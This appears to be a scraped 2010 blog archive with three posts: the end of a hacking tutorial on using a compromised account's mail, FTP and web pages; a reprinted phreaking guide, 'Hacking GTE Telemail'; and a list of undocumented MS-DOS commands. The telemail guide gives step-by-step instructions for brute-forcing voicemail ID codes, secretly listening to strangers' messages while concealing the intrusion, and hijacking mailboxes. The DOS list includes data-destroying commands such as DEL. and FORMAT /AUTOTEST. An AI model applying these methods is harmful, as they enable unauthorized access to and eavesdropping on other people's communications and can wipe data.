read them very carefully - four or five times. Join your local Linux users group, if you have one. And, later on, download a few guides on programming and read through them when you get some time. With some effort (it isn't easy), you can become a respected hacker and take control of the Net.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[Back to <u>Index</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">CONGRATULATIONS:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">You have gained access.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">If you now have the login code and password, you may use the users mail account, FTP priviliges (change their web pages by uploading new ones), and HTTP access.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">(If you have only got access to a user level account, do not despair. If you have a user level account, it is easy to use that to later get a root level account. More on this when this study is made bigger).<br />
<br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin-bottom: 0.0001pt;"><br />
</div>Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com1tag:blogger.com,1999:blog-4044212408950825345.post-47606633163974596412010-07-24T22:10:00.000+07:002010-07-24T22:10:28.955+07:00Hacking GTE Telemail ...........................................<br />
..... .....<br />
... ======================= ...<br />
.. ___ ..<br />
. _ _ / / .<br />
. // // /__ / .<br />
. //_// // //merica .<br />
. /___/nderground .<br />
. .<br />
. proudly presents .<br />
. .<br />
. ======================== .<br />
. HACKING GTE TELEMAIL .<br />
. written by .<br />
.. MASTER MICRO<br />
.. By : cyberRF<br />
... ======================== ...<br />
..... .....<br />
...........................................<br />
<br />
<br />
WHAT IS TELEMAIL?<br />
=================<br />
For many years, rich corporate mongers have invested in personal telemail<br />
boxes for their employees. The generic term for this type of messaging system<br />
is a "voice mailbox". It's nothing more than an answering machine with a few<br />
extra frills. The good thing about voice mailbox hacking, is that there are<br />
1-800 access numbers, which makes it easy for anyone who doesn't feel like<br />
phreaking to your number, to leave you a message.<br />
<br />
OPERATING GTE TELEMAIL<br />
======================<br />
To play with any voice mailbox, it is usually necessary to have a touch<br />
tone fone. This incorporates the standard 0-9 digits and the two function keys.<br />
The symbol that looks like a tic-tac-toe sign, "#", is called the pound key.<br />
The other is an asterisk, and is called that, or the "star". You will need to<br />
be farmiliar with those to use this system.<br />
GTE Telemail, as like other voice mailoxes are VOICE. IE: You don't use<br />
your modem for hacking this, it's all manual (pain in the butt, yes, I know).<br />
If you like, you can try all this out while you are reading the file, just so<br />
that you get used to the service.<br />
The phone number for this service is: 1-800-348-6551. When you first dial<br />
the number, and it answers, you'll hear this: "<beep><beep><beep><booo> Hello.<br />
You've reached the telemessages service. The person you are calling is<br />
presently unavailable. To leave a message, enter the address of the person you<br />
are calling; or to access your regular message box, enter the pound sign".<br />
Most of the hacking that you are going to be doing is on the "regular<br />
message box". This is where the people get the messages that people have sent<br />
to them. You would dial the pound key after that announcement. To make your<br />
life easier, you never have to wait for those recordings to finish. You can<br />
interrupt the lady only after she has begun speaking, but you can dial the<br />
pound key right after the beeps. After pressing the pound key, you will hear<br />
another recording: "Please enter your id number". It is here that you would<br />
enter someone's id number. You will then hear a short "beep". Another recording<br />
will come on if it is a valid number: "You have XX new messages, and XX saved<br />
messages". New messages are ones that you haven't heard yet, saved messages are<br />
the ones that you wanted to keep for later reading, or rereading.<br />
There are different types of boxes on this service. Some have "Greeting<br />
Messages" and "Bulletins", some have a strange method of picking up messages. I<br />
will go over those now:<br />
If you have messages waiting, you can receive them by dialing "2".<br />
Sometimes, it won't give you that option, so you will have to dial "011" for<br />
your new messages, or "012" for your saved messages. When you are listening to<br />
your messages, you may dial a "2" to pause, and another "2" to continue. A "3"<br />
will rewind the messages a couple of seconds back, and a "4" will fast forward<br />
the message. Usually, if you hit the "4" key twice in a row quickly, it will<br />
jump to the end of the message and beep, giving you a second menu.<br />
After you have heard the message, you are given these options:<br />
022: Reply back to the person<br />
021: Redirect the message<br />
7: Save the message<br />
5: Delete the message<br />
Dialing the asterisk at any point is like an abort command. It usually will<br />
stop what you are doing and go to the last menu before what you are currently<br />
doing. If you dial the asterisk at the top menu, "To get your new messages,<br />
dial 011...etc", you will get a recording that says, "GoodBye", and then be<br />
hung up.<br />
<br />
<br />
HACKING GTE TELEMAIL<br />
====================<br />
....is a pain, but it works.<br />
<br />
The object when hacking these things is find out as many 6 digit personal<br />
id codes as possible. You see, to send someone a message, that involves a 7<br />
digit code. Since the 6 digit code is easier to get, and gives you more<br />
information, you have to scan through an entire prefix of numbers to get as<br />
many id codes as possible.<br />
All you really need is a touch tone fone, and a notebook. It's handy if<br />
your fone has some kind of memory, and you can recall any number at a single<br />
touch. Like my fone here, there are 12 extra buttons that you can program<br />
numbers into.<br />
First, you have find out a prefix for Texas. You know, a prefix, the first<br />
three numbers in a seven digit fone number, not counting the area code. There's<br />
lots of ways to do this. You can either whip out your fone book, or dial<br />
"1-214-555-1212" or "1-817-555-1212". Most of the time, you can phreak to those<br />
two numbers from any service. I know that Sprint lets you.<br />
Tear out a separate piece of paper from the notebook, and draw up a chart<br />
that looks similar to this:<br />
<br />
0 0 1 2 3 4 5 6 7 8 9<br />
1 0 1 2 3 4 5 6 7 8 9<br />
2 0 1 2 3 4 5 6 7 8 9<br />
3 0 1 2 3 4 5 6 7 8 9<br />
4 0 1 2 3 4 5 6 7 8 9<br />
5 0 1 2 3 4 5 6 7 8 9<br />
6 0 1 2 3 4 5 6 7 8 9<br />
7 0 1 2 3 4 5 6 7 8 9<br />
8 0 1 2 3 4 5 6 7 8 9<br />
9 0 1 2 3 4 5 6 7 8 9<br />
<br />
The chart stands for numbers from 00-99. The first row, represents "00-09",<br />
the second row would be "10-19" (understand?). To read it, the number on the<br />
farthest left is the first digit in the number, then you just go from "0-9" on<br />
the rest of the row for the second digit. It's easier than writing out "00-99"<br />
in order.<br />
Now, take the 3 digit prefix in Texas, and add a "0" after it. In other<br />
words, if the prefix you picked was "123" (No, that's not a real working<br />
prefix), then you'd have "1230". If you are using the programmable fone that I<br />
mentioned before, put this four digit number into a key, or somewhere on the<br />
fone that you can retrieve it easily.<br />
Dial up the number (1-800-348-6551), and wait for the<br />
"<beep><beep><beep><boo>", as soon as you hear the last <boo> sound, hit the<br />
pound key. As soon as the lady begins to speak, hit the key that has those four<br />
numbers programmed into it, or manually dial those four numbers. After that,<br />
dial the two digit number that you get from the chart. This should make 6<br />
digits in all. If it's an invalid code, you will get this recording: "We're<br />
sorry, we are unable to process the id you entered, please try again." As soon<br />
as you hear the lady start to say "We're sorry", hit the asterisk button.<br />
You'll hear two quick beeps. Cross out the number on the chart that didn't<br />
work. For example: You just began the dialing, you picked "123" for a prefix,<br />
and added the "0" on to get "1230". You were starting from the first line of<br />
your chart, which looks like this:<br />
0 0 1 2 3 4 5 6 7 8 9<br />
You would dial the number and everything, press the pound sign, and hit the key<br />
that had the "1230" on it, or if you didn't have that kind of fone, you would<br />
dial the "1230" manually. You would then dial a "00". If that was invalid, and<br />
the recording began saying "We're sorry....", you hit the asterisk, and then<br />
cross out the zero (not the farthest one on the left).<br />
If the code didn't work, you would go on to the next number. In the<br />
example, you would be dialing "01". If the "123001" didn't work, you'd cross<br />
out the "1" and go onto "02".<br />
GTE Telemail only gives you three tries at getting an id code. On the third<br />
try, you will get this kind of recording (which, by the way, you can abort, and<br />
hit "*" where it will just hang up on you): "We are still unable to process<br />
your id. For assistance, please call 800-527-1149. Thank You" <click>.<br />
<br />
Now, let's say that you didn't get one of these recordings, but you heard a<br />
short beep after you entered in the whole id. That means you got a working id<br />
code! On your chart, don't cross out the number, but circle it. In the<br />
notebook, write out the entire 6 digit id code.<br />
If there are no messages on the box, just hit the asterisk until you hear<br />
"good-bye", and go onto the next number on your chart. If there ARE messages,<br />
you want to read them without the owner knowing. In some situations, that's<br />
impossible, but just don't kill anybody's messages.<br />
You want to try to keep all NEW messages NEW, so that if the original owner<br />
of the box calls up, he will still have the same messeage. GTE operators throw<br />
a pissy fit if the messages aren't going through, and they order all of these<br />
conferences with their customers. Anyhow, if there is only 1 new message, after<br />
you've listened to it, press the "*" button, and that will keep the message<br />
new. If there are more than one, press "7" to put the message into the "saved<br />
messages bank" after you have listened to them, except for the last message,<br />
which you can still keep as new by hitting the asterisk.<br />
Reading saved messages is easier because nobody has to know that you did<br />
it. Usually after reading your new messages, the system will say, "beginning<br />
saved messages" if there are any. Otherwise, just dial "012" from the main menu<br />
for the saved messages. Remember to save all of these messages with the "7"<br />
button.<br />
Now, the object here, when listening to all of these messages is to find<br />
out as much information as possible about the owner of that id code, and the<br />
people that are sending the message to that box. Let's say you are listening to<br />
a message, and you hear this: "John, this is Michael". That's great, you would<br />
scratch down "John - Michael" in your notebook right after where you wrote down<br />
that box's id number. This will remind you that John owns that box, and Michael<br />
sent the message to him.<br />
If you EVER hear them giving out the 7 digit address codes over a<br />
telemessagenger, be sure to write that down too. Any other information is<br />
handy, too.<br />
<br />
Now, what on earth are you going to do with all of this information? You're<br />
going to set up your own boxes! Or at least take over other people's boxes. The<br />
first method is called "Read and Reply". Let's say, for example, you had one<br />
box, and a message was sent that said, "Hello John, this is Michael.", and on<br />
another box, you heard a message that said, "Hello Michael, this is Judy", you<br />
might have a match. You see, since you now know Michael's box number, and<br />
Michael sent a message to this John dude, all you have to do is go to the first<br />
box and reply to the message that Michael sent, and it will be sent back to<br />
Michael's box.<br />
So, this is exactly what you must do if you think you have a match (I will<br />
use the example above for references to make this easier):<br />
Ex.:<br />
Id Code: 123000 had a message to John, from Michael<br />
Id Code: 123050 had a message to Micahael, from Bubba.<br />
<br />
Ok, so you think that you have a match. You would go to the box that had the<br />
message >FROM< the guy who's box you know. In other words, you would dial<br />
"12300", and listen to the John/Michael message again. Press the "4" button to<br />
fast forward through the message, until you hear the beep. Dial a "022" to<br />
reply to the message. You would then dial a "1" to begin your message<br />
recording, where you would say the last 3 digits into the phone (in this case,<br />
you would say "000"), and press "5" to end the recording. It will then say "You<br />
reply has been sent. You may now dial 022 to reply...etc". Just press the<br />
asterisk until it says "good-bye", and call back. When you get on, get onto<br />
the id number 123050, because that's the id that you think is the same that<br />
sent that John dude a message. If there is a new message, with your voice<br />
saying "000" into it, you got it! More on this in a second.<br />
Don't cry if the boxes don't match up and the message doesn't go through.<br />
There is still a chance that there are other people with the same name. Just<br />
set them up the same way. Now, if, when you first listened to the messages on a<br />
box, heard your voice saying three digits, but you never tried matching them up, then you just got a box! Write down the two numbers together somewhere.<br />
<br />
If you have two matches, this is what you do... I am going to use the<br />
examples above with the 123000 and 123050 boxes. Ok, now you have two boxes<br />
that are "linked" through messages. Your next mission is to get both boxes to<br />
have messages from one another that have YOUR voice on it, and to kill all<br />
other messages. In this example, this is what you would do: Get onto the 123000<br />
box and reply to the "from michael" message. For your message, don't say<br />
anything, just have about 7 seconds of silence, and then finally hit "5" to<br />
finish the message. Next, you would go to the 123050 box, and would listen to<br />
the 7 seconds of silence message that you just sent. Reply back to this, and do<br />
the same thing. So now, both boxes have these "7 seconds of silence" or "blank"<br />
messages in their boxes. Next, you would go to both boxes and kill all of the<br />
other messages in the box. Everything, even the "michael" message goes.<br />
You have now siezed the box, and it is at your will. You must pick one box<br />
to be your "update" box, and the other to be your "pickup" box. The "Update"<br />
box is the one that will have your greeting message on it, like "You've dialed<br />
Master Micro's box, to send him a message, dial 022 after the tone." The<br />
"Pickup" line is the box that will be used for only YOU, where you read<br />
messages that other phreaks have left you. To set these up, do the following:<br />
Go to the box you picked as your "pickup" line. Read the blank message and reply to it. For the message, say whatever, like "This is so-and-so's box, dial<br />
022 after the beep to reply". You then dial up the update line, read the<br />
welcome message that you just sent, and hit "7" after listening to it to save<br />
it. You'll hear the blank message somewhere, either as your new or your saved<br />
message. Kill the blank message on the update line. Now, if you ever wanted to<br />
change your greeting message, go to the pickup line, record a new message by<br />
replying to the blank one; go to the update line, and kill the old greeting<br />
that you don't want, and save the new one.<br />
Once you have your box set up, all you have to do is give all your phreak<br />
phriends the address and instructions to the update line. Tell them to save the<br />
messages when they read it, and to reply to it using 022 if they want to send<br />
you a message. Occassionally, check your pickup line for new messages, and kill<br />
them after you have read them just in case the owner of the box catches on and<br />
changes his id code.<br />
<br />
The other method to set up boxes is used mainly for setting up codelines, or<br />
other kinds of boxes where you don't want replies, or it is not totally<br />
necessary to have replies. A codeline is a voice box that you have devoted to<br />
telling your phriends new codes, and any other new info. Setting these up are<br />
easy as hell, and you can make as many as you want, but there is a catch. You<br />
must have figured out both the 7 digit address code, and the 6 digit id code<br />
for the same box. Let's say there was a dude named Frank, and his address code<br />
(the number you dial as soon as you get on, instead of dialing the pound key<br />
and id number, to send the guy a message) was "1234567", and his id code was<br />
"098765". First, to find out if the address and the id code are the same, you<br />
do the same method of matching up first names. Call up the telemail service,<br />
and instead of dialing the pound key and everything, dial the 7 digit address<br />
code, and send a message saying something like, "yess umm.. <click>" and hit 5.<br />
They'll think it's a screwed up message that didn't go through if the address<br />
and the id code aren't for the same box. Anyways, after you send the message,<br />
you'll be hung up on by GTE. Just call back, and this time enter the pound and<br />
the 6 digit id code (in this case, 098765). If there is a message that says,<br />
"yess umm.. ", then you go it! Then next thing you do is jump up and down and<br />
pop yourself open a brewski.<br />
After you've popped open your brewski, make sure you are still coherent<br />
enough to set up a codeline, or whatever else you want to set up. I was gonna<br />
set up those 1-212-970-XXXX phone sex recordings on a few, because you can set<br />
up as many as you want; just to amuse the kiddies, and show them your power.<br />
Anyhow, whip out your notebook, and pick a box that has no messages in it. If<br />
you don't have any, then pick a box, and go to it, and kill off all of the<br />
messages. Go to that box, and after the recording tells you that you have no<br />
new and no saved messages, you will be given a menu. Dial the address code of<br />
the box that you have the id and address to (in this case, 1234567). Enter a<br />
message, that says anything you want -- if you can't think of anything, just do<br />
the 'ole blank message. Save it and everything. You then dial the asterisk<br />
until you get hung up, and then call back again. This time, enter the id code<br />
of the box that you have both the addr and id to. When you hear the message<br />
that you just sent from the other box, reply to it, and in that message, put<br />
whatever you want into it. After you are done, just kill the message you just<br />
heard, so there is nothing on the box that you have both info for. Now, you can<br />
screw around with the other box that you set up, but try not to have any<br />
messages, or anything screwy on the both you have both things for. If you do,<br />
you're just going to wind up having it dead, so that's my warning. Tell people,<br />
when you give out the other box number, the one you just set up, not to reply<br />
to send you messages.<br />
<br />
Ok, now, going back to near the beginning of the file, about talk of the<br />
chart, let's say you went from 00 to 99, and you've filled out your chart. The<br />
prefix you were using was: 1230. You would then change that "0" to a "1". So<br />
your new four number prefix would be 1231. Keep doing this until you are bored,<br />
or you have gone up to 1239. Then, you have to pick a new Texan prefix, and<br />
start with 0 again. Now, that's a lot of numbers...<br />
<br />
Also, that 1-800 number is not the only one in the country. There are<br />
several others. There is probably a GTE in lots of the major states. If you<br />
find any new numbers, look for prefixes for THAT state and not Texas. Shit, I<br />
don't even live in Texas. I live in Russia.<br />
<br />
<br />
<br />
<br />
"This is Master Micro for the Underground America Codeline............."<br />
Thank You for your support.<br />
<br />
Special Thanks to Mr. Xerox - who if I didn't blow school for that day, and he<br />
didn't blow work, would have never found out the formats for GTE Telemail.<br />
Also, because of his board, him and I started hacking and phreaking again, and<br />
without Underground America, I wouldn't be typing this file right now.<br />
<br />
DOWNLOADED FROM P-80 SYSTEMS......<br />
<br />
</click></click></boo></boo></beep></beep></beep></booo></beep></beep></beep>Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-47159064179617384912010-07-24T22:08:00.000+07:002010-07-24T22:08:11.906+07:00undocumented DOS commandsCollection of undocumented and obscure features in various MS-DOS versions.<br />
---------------------------------------------------------------------------<br />
<br />
Contents:<br />
<br />
- TRUENAME<br />
- FDISK /STATUS<br />
- FDISK /MBR<br />
- SHELL=C:\COMMAND.COM /P /F<br />
- COMMAND /F<br />
- COMMAND /P<br />
- COMMAND /D<br />
- VER /R<br />
- ECHO OFF and ECHO ON<br />
- FORMAT /AUTOTEST<br />
- FORMAT /BACKUP<br />
- FORMAT /SELECT<br />
- FORMAT /SELECT /U<br />
- FORMAT /H<br />
- IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command><br />
- Using ATTRIB to hide directories<br />
- SWITCHES=/W<br />
- FOR %%V IN (/SOMETHING)<br />
- DIR,<br />
- COPY. A:<br />
- DOS?=HIGH<br />
- INSTALLHIGH<br />
- Using : for batch file comments<br />
- REM in lines with pipes or redirection<br />
- Delimiter character<br />
<br />
===========================================================================<br />
TRUENAME<br />
--------<br />
<br />
Internal DOS 5.0 command. Canonicalize a filename or path (using DOS interrupt 21h, function 60) prints the actual directory.<br />
<br />
Syntax:<br />
<br />
TRUENAME filename - Prints the complete path to file.<br />
TRUENAME directory - Prints the complete path to directory.<br />
<br />
Note: If the path is in a network, it starts with a \\machine-name.<br />
<br />
TRUENAME is analogous to the UNIX "whence" command. It returns the real fully-qualified path name for a command.<br />
<br />
TRUENAME is useful in networks, where a physical drive may be mapped to a logical volume, and the user needs to know the physical location of the file. It ignores the DOS SUBST and JOIN commands, or network MAPped drives.<br />
<br />
TRUENAME is an undocumented MS-DOS feature, but it is documented in JP Software's 4DOS software (COMMAND.COM replacement) as follows:<br />
<br />
Syntax:<br />
<br />
TRUENAME [d:][path]filename<br />
<br />
Purpose:<br />
<br />
Returns a fully qualified filename.<br />
<br />
Comments:<br />
<br />
TRUENAME will see "through" JOIN and SUBST commands, and<br />
requires MS-DOS 3.0 or above.<br />
<br />
Example:<br />
<br />
The following command uses TRUENAME to get the true pathname<br />
for a file:<br />
<br />
c:\>subst d: c:\util\test<br />
c:\>truename d:\test.exe<br />
<br />
c:\util\test\test.exe<br />
<br />
TRUENAME : will reveal the full name drive and path of the filename. If you specify a wildcard (*) in the filename, it will expand the filename to use question marks instead. If the path includes the ..\ sequence, TRUENAME will examine the directory structure and calculate the path.<br />
<br />
Stranger still, the line:<br />
<br />
TRUENAME \CRONK\FLIBBET\..\ART<br />
<br />
...produces the response:<br />
<br />
C:\CRONK\ART<br />
<br />
...even if the directories \CRONK\FLIBBET and the file ART don't exist! Don't expect this command to work well across networks. After all, this is still undocumented in MS-DOS for a reason!<br />
<br />
===========================================================================<br />
FDISK /STATUS<br />
-------------<br />
<br />
Prints a screen just like using option 4 of FDISK, "Partition information", but includes extended partition information. Nice if you want to get an overview without fear of pressing the wrong keys.<br />
<br />
Doesn't work in DOS 3.30.<br />
<br />
===========================================================================<br />
FDISK /MBR<br />
----------<br />
<br />
MS-DOS 5.0 FDISK has an undocumented parameter, /MBR, that causes it to write the master boot record to the hard disk without altering the partition table information. While this feature is not documented, it can be told to customers on a need-to-know basis.<br />
<br />
Warning: Writing the master boot record to the hard disk in this manner can make certain hard disks partitioned with SpeedStor unusable. It can also cause problems for some dual-boot programs, or for disks with more than 4 partitions. Specific information is below.<br />
<br />
What is the MBR?<br />
<br />
At the end of the ROM BIOS bootstrap routine, the BIOS will read and execute the first physical sector of the first floppy or hard drive on the system. This first sector of the hard disk is called the master boot record, or sometimes the partition table or master boot block. At the beginning of this sector of the hard disk is a small program. At the end of this sector is where the partition information, or partition table, is stored. This program uses the partition information to determine which partition is bootable (usually the first primary DOS partition) and attempts to boot from it.<br />
<br />
This program is what is written to the disk by FDISK /MBR and is usually called the master boot record. During normal operation, FDISK only writes this program to the disk if there is no master boot record.<br />
<br />
Why is the MBR changed during Setup?<br />
<br />
During installation of Microsoft MS-DOS 5 Upgrade, Setup will replace the master boot record on the hard disk with code to display the message:<br />
<br />
The MS-DOS 5.0 Setup was not completed.<br />
Insert the UNINSTALL #1 diskette in drive A.<br />
Press the ENTER key to continue.<br />
<br />
This message should be erased and the master boot code rewritten before Setup is completed. If a problem occurs during Setup and you return to the previous MS-DOS, UNINSTAL should also remove this message. However, should Setup or UNINSTAL fail to remove this message, or should the master boot record become corrupted, a new master boot record can be written to the disk using the following command:<br />
<br />
C:\>fdisk /mbr<br />
<br />
WARNINGS:<br />
<br />
This option should not be used if:<br />
<br />
- the disk was partitioned using Storage Dimensions'<br />
SpeedStor utility with its /Bootall option<br />
- more than 4 partitions exist<br />
- certain dual-boot programs are in use<br />
<br />
Storage Dimensions' SpeedStor utility using the /Bootall option redefines the drive's physical parameters (cylinder, head, sector). /BOOTALL stores information on how the drive has been changed in an area of the master boot record that MS-DOS does not use. FDISK /MBR will erase that information, making the disk unusable.<br />
<br />
Some older OEM versions of MS-DOS and some third-party partitioning utilities can create more than 4 partitions. Additional partition information is commonly stored information on partitions in an area that FDISK /MBR will overwrite.<br />
<br />
Some dual-boot programs have a special MBR that asks the user which operating system they want on bootup. FDISK /MBR erases this program. Dual-boot systems that boot whichever partition is marked Active are not affected by FDISK /MBR.<br />
<br />
If you have a Boot Sector Virus, just boot from a known "clean" floppy disk that's write protected and which has FDISK on it, and run FDISK /MBR.<br />
<br />
===========================================================================<br />
SHELL=C:\COMMAND.COM /P /F<br />
--------------------------<br />
<br />
The /F in the CONFIG.SYS SHELL= statement forces a "Fail" response to all "Abort, Retry, Fail" prompts issued by the DOS critical error handler.<br />
<br />
===========================================================================<br />
COMMAND /F<br />
----------<br />
<br />
Entered on the command line, COMMAND /F makes all those annoying "Abort, Retry, Ignore, Fail" disk error messages default to "Fail" from then on until rebooting.<br />
<br />
===========================================================================<br />
COMMAND /P<br />
----------<br />
<br />
For DOS 3.30 (not checked with other versions): Docs say that this doesn't allow you to exit back to the previous shell, but /P also forces AUTOEXEC.BAT to be run on secondary shells.<br />
<br />
===========================================================================<br />
COMMAND /D<br />
----------<br />
<br />
When used with a primary shell, or secondary with /P, prevents execution of AUTOEXEC.BAT.<br />
<br />
===========================================================================<br />
VER /R<br />
------<br />
<br />
Yields extended information about the DOS version:<br />
<br />
MS-DOS Version 5.00<br />
Revision A<br />
DOS is in HMA<br />
<br />
Doesn't work with DOS 3.30. VER /R is a documented feature of JP Software's 4DOS.<br />
<br />
===========================================================================<br />
ECHO OFF and ECHO ON<br />
--------------------<br />
<br />
Entering ECHO OFF from the command line erases the prompt and leaves just a cursor on the screen. ECHO ON from the command line restores the prompt. This works with all version of DOS.<br />
<br />
One of the most frequently asked questions is "How do I ECHO a blank line in a batch file?" The most common answer is to use ECHO directly followed by a period: ECHO. like so. However, just about any "white space" character will work, as well as any "delimiter". The following alternatives can be used: ECHO. ECHO" ECHO, ECHO: ECHO; ECHO[ ECHO] etc. Apparently it's just the way that the command handles the delimiter and has been available from way back! Microsoft just began mentioning it in the documentation recently, though, and their examples use a period.<br />
<br />
===========================================================================<br />
FORMAT /AUTOTEST<br />
----------------<br />
<br />
The autotest parameter will allow FORMAT to proceed, checking the existing format of the disk (unless the /U parameter with DOS 5 or 6 is also present), and proceeding with the format.<br />
<br />
All this will take place with no delay and no waiting for user input. It will also end without pausing. It will not ask for a volume label or whether to format another diskette.<br />
<br />
WARNING! This procedure will also work on hard drives! Be very cautious if you plan to use this feature!<br />
<br />
===========================================================================<br />
FORMAT /BACKUP<br />
--------------<br />
<br />
This works exactly like /AUTOTEST, but it does ask for a volume label.<br />
<br />
===========================================================================<br />
FORMAT /SELECT<br />
--------------<br />
<br />
This is like the DOS MIRROR command... For safety-fanatics only.<br />
<br />
===========================================================================<br />
FORMAT /SELECT /U<br />
-----------------<br />
<br />
Just makes a disk unreadable. Guess it could be handy?<br />
<br />
===========================================================================<br />
FORMAT /H<br />
---------<br />
<br />
In DOS 3.30 (not tested with other versions), FORMAT /H will cause the format to begin immediately after pressing Y in response to "Format another", rather than displaying "Place disk to be formatted in drive x: and press Enter" on a second and subsequent disks.<br />
<br />
In DOS 5.0, FORMAT reports "invalid switch".<br />
<br />
===========================================================================<br />
IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command><br />
----------------------------------------------------------------<br />
<br />
This is a handy quirk of DOS. Installable drivers are seen as files in all directories. You can use the if exist test to either test for the existence of a directory, with "if exist <dirname>\nul", which fails if the directory does not exist because the nul device is not found; or to test whether any driver is loaded, such as the DOS 5 or 6 EMM386 memory manager.<br />
<br />
Caveats: For testing NUL, you need to know the name of the directory or the driver whose existence you are testing, and this is MS-DOS specific -- it doesn't work on network drives, and may not work under DR-DOS.<br />
<br />
Where did you learn the "EMMXXXX0" name from? Instead of typing MEM /C, type MEM /D for the "debug" listing.<br />
<br />
The only trouble is EXISTS returns true for COM3/4 and LPT2/3 even if the hardware does not exist.<br />
<br />
===========================================================================<br />
Using ATTRIB to hide directories<br />
--------------------------------<br />
<br />
The DOS 5.0 and 6.0 ATTRIB command can do the same thing for directories as it can for files: ATTRIB +H <dirname> will hide the named directory.<br />
<br />
===========================================================================<br />
SWITCHES=/W<br />
-----------<br />
<br />
Enables you to have the Windows 3.0 WINA20.386 file anywhere on your boot drive. Without this you have to have it in the root directory.<br />
<br />
This should not be used with Windows 3.1, since it appears to waste around 120K of UMBs.<br />
<br />
===========================================================================<br />
FOR %%V IN (/SOMETHING)<br />
-----------------------<br />
<br />
How can a batch file (without 4DOS) determine from which drive it has been started?<br />
<br />
Example: C:\>a:test.bat<br />
<br />
Now my batch should be able to find out that it is located on drive A: (not the path, only the drive!).<br />
<br />
In a batch file, the variable %0 contains the name of the batch file as it was typed at the command line. If you run the batch file as A:TEST.BAT, %0 will be "A:TEST.BAT". If you have the directory on your path, and simply type TEST, then %0 will be "TEST". The drive, path, and extension will only appear in %0 if you enter them in the command used to call the batch file (either typed at the command line, or called from another batch file). So, you must specify the drive as part of the batch filename for this to work.<br />
<br />
To extract the drive only from %0, use the undocumented FOR %%V in /SOMETHING command:<br />
<br />
set drive=<br />
for %%v in (/%0) do call test2 %%v<br />
echo Calling drive is %drive%<br />
<br />
...where TEST2.BAT is:<br />
<br />
if not '%drive%'=='' set drive=%1:<br />
<br />
FOR %%V IN (/SOMETHING) DO WHATEVER will do WHATEVER twice -- the first time with %%V set to the first character in SOMETHING ("S"), the second time with all the remaining characters in SOMETHING ("OMETHING"). If SOMETHING is only a single character, WHATEVER will only be called once, with that character in %%V. If the single character is a wildcard (? or *) that wild card will not be expanded to a set of filenames. (The main purpose of this feature is apparently to allow inclusion of the literal characters "?" and "*" without them being expanded.)<br />
<br />
This works in DOS 3.30 and later.<br />
<br />
===========================================================================<br />
DIR,<br />
----<br />
<br />
Using a comma immediately after DIR shows ALL files, including the HIDDEN ones.<br />
<br />
This appears only to work with DOS 5.0 and 6.0. With 3.30, it doesn't display either IO.SYS, MSDOS.SYS (both with S, H and R attribs) or a test file with A and H attribs.<br />
<br />
With DOS 5.0, it displayed a test file with H and A, but would not display IO.SYS or MSDOS.SYS with S, H and R. This isn't surprising actually, since S alone (without H) will prevent inclusion of a file in a normal DIR.<br />
<br />
Not tested with DOS 4.x. Not supported by JP Software's 4DOS.<br />
<br />
===========================================================================<br />
COPY. A:<br />
--------<br />
<br />
The use of a period IMMEDIATELY after some DOS statements will work just like *.*<br />
<br />
Examples: DEL. (erase all files in current directory)<br />
COPY. A: (copy all files in current directory to A:)<br />
<br />
There may be more statements with which it works.<br />
<br />
This is actually a documented although obscure feature, though the ability to use the period with COPY is not documented. What is documented is the fact that "." and ".." can be used to represent the current and parent directories respectively, and these will work with many applications which can handle directory names as arguments. In this case the "." could also be viewed as a replacement for "*.*"<br />
<br />
===========================================================================<br />
DOS?=HIGH<br />
---------<br />
<br />
DOS?=HIGH in CONFIG.SYS with DOS 6.0 will prompt you whether to load the DOS kernel high (into the HMA) or not.<br />
<br />
===========================================================================<br />
INSTALLHIGH<br />
-----------<br />
<br />
In DOS 6.0, there is an undocumented CONFIG.SYS command called INSTALLHIGH= which works just like INSTALL= but loads the TSR high (into upper memory).<br />
<br />
The only drawback to this is that MemMaker will not touch INSTALLHIGH lines during the optimizing process. It just takes it as it is currently. But then again, INSTALL= is ignored too. All in all, INSTALL and INSTALLHIGH really are commands to set up manually by the user, and are not really recommended for normal use. Load TSRs at the beginning of AUTOEXEC.BAT (and using LOADHIGH if desired).<br />
<br />
Example:<br />
<br />
DOS=HIGH,UMB<br />
DEVICE=C:\DOS\HIMEM.SYS<br />
DEVICE=C:\DOS\EMM386.EXE NOEMS<br />
INSTALLHIGH=C:\DOS\SHARE.EXE<br />
<br />
===========================================================================<br />
Using : for batch file comments<br />
-------------------------------<br />
<br />
DOS uses a leading : to indicate a label in a batch file. If the next character following the : is a space or other non-alphanumeric character, then DOS will decide it's an invalid label and skip to the next line, performing no further action. Faster batch file processing is achieved using this method for comments instead of REM commands.<br />
<br />
===========================================================================<br />
REM in lines with pipes or redirection<br />
--------------------------------------<br />
<br />
For example: REM echo y | del *.*<br />
<br />
